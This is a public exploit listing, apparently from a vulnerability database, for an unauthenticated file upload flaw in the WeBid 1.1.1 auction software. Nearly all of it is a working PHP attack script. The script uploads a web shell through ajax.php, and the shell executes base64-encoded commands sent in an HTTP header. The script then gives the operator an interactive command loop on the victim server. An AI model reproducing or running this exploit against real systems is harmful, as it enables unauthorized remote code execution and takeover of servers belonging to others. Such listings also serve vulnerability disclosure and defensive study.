Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31858
HistoryMar 23, 2015 - 12:00 a.m.

WeBid 1.1.1 Unrestricted File Upload Exploit

2015-03-2300:00:00
vulners.com
15

<?php

/*

,–^----------,--------,-----,-------^–,
| ||||||||| `--------' | O … CWH Underground Hacking Team …
`±--------------------------^----------|
`\_,-------, ___________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\
(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

Exploit Title : WeBid 1.1.1 Unrestricted File Upload Exploit
Date : 20 February 2015
Exploit Author : CWH Underground
Site : www.2600.in.th
Vendor Homepage : http://www.webidsupport.com/
Software Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid&#37;20v1.1.1/WeBid-1.1.1.zip/download
Version : 1.1.1
Tested on : Window and Linux

#####################################################
VULNERABILITY: Arbitrary File Upload Vulnerability
#####################################################

/ajax.php
/inc/plupload/examples/upload.php

#####################################################
DESCRIPTION
#####################################################

This exploit a file upload vulnerability found in WeBid 1.1.1, and possibly prior. Attackers can abuse the
upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.

#####################################################
EXPLOIT
#####################################################

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");

fputs&#40;$sock, $packet&#41;;
return stream_get_contents&#40;$sock&#41;;

}

print "\n±---------------------------------------+";
print "\n| WeBid Unrestricted File Upload Exploit |";
print "\n±---------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage…: php $argv[0] <host> <path>\n";
print "\nExample…: php $argv[0] localhost /";
print "\nExample…: php $argv[0] localhost /WeBid/\n";
die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "–o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"name\"\r\n\r\n";
$payload .= "shell.php\r\n";
$payload .= "–o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "–o0oOo0o–\r\n";

$packet = "POST {$path}ajax.php?do=uploadaucimages HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Cookie: PHPSESSID=cwh"."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";

print "\n\nExploiting…";
sleep(2);
print "Waiting for shell…\n";
sleep(2);

http_send($host, $packet);

$packet = "GET {$path}uploaded/cwh/shell.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

print "\n ,–^----------,--------,-----,-------^–, \n";
print " | ||||||||| `--------' | O \n";
print " `±--------------------------^----------| \n";
print " `\_,-------, ___________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\
( \n";
print " / XXXXXX / \n";
print " / XXXXXX / … CWH Underground Hacking Team … \n";
print " (________( \n";
print " `------' \n";

while(1)
{
print "\nWebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

################################################################################################################

Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2

################################################################################################################
?>